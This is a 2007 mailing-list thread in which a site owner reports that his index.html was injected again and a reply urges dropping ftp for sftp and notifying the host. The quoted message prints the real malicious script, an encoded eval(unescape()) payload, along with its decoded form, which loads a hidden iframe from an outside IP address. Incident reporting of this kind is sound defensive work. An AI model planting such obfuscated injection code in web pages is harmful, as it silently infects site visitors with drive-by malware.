[ale] I've been hacked!

Wed Nov 21 07:55:24 EST 2007

Most likely it is a windows exploit (note the iframe tag) that installs
something nasty like a bot infection of a backdoor.

I HIGHLY recommend that ftp be TURNED OFF. Use sftp (part of the ssh
tools package) instead. If the hosting provider does not support sftp,
get a new one and proclaim loudly about the insecurity of the provider.

Further, notify the hosting provider of the security breach and the
intent of your announcing of the breach to the security network and
spamhous. It is an integrity issue that the hosting providers do all
they can to ensure they are not the participants in the ongoing war of
the crap on the net. If they choose to not exercise an acceptable level
of due diligence, exercise your right to spend your hosting cash
elsewhere while also exercising your free speech rights to proclaim to
the world the facts of the situation.

If you are aware of other hosting clients on this same machine, send
them a notice with this information and the suggestion that they should
also verify there site has not been tampered with as well.

On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
> Last summer I received notification from Google that a web page on one 
> of my web hosting accounts was infected with some sort of malware bug. 
> 
> This account only has ftp access so I changed the password for the one 
> and only ftp account and removed the offending code from my index.html 
> file.  I also added a cron job to another site to compare a good 
> index.html with the one on the site that had been hacked in case they 
> came back.
> 
> They did.
> 
> Today I received a message that said the compare failed and found the 
> following at the top of the body in my index.html file:
> 
> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
> </script>
> 
> That script, unescaped looks like:
> 
> window.status='Done';document.write('<iframe name=7b73 
> src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
> width=351 height=133 style=\'display: none\'></iframe>'
> 
> Has anyone seen anything like this before?  I wonder what  sort of evil 
> function it might perform?
> 
> I also wonder how they got access the second time?  I went through the 
> cgi scripts on that system to be sure they were mine. There aren't any 
> php files on the system.
> 
> I attempted to look up the ip address but nslookup said it didn't exist, 
> however it pings and the index.html file from it is the default apache2 
> index file.  I suspect that system has been hacked as well.
> 
> Note the incident from last Summer was a different one.
> 
> Thanks,
> Jim.
> 
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale
> 
-- 
James P. Kinney III          
CEO & Director of Engineering 
Local Net Solutions,LLC        
770-493-8244                    
http://www.localnetsolutions.com

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics)
<jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part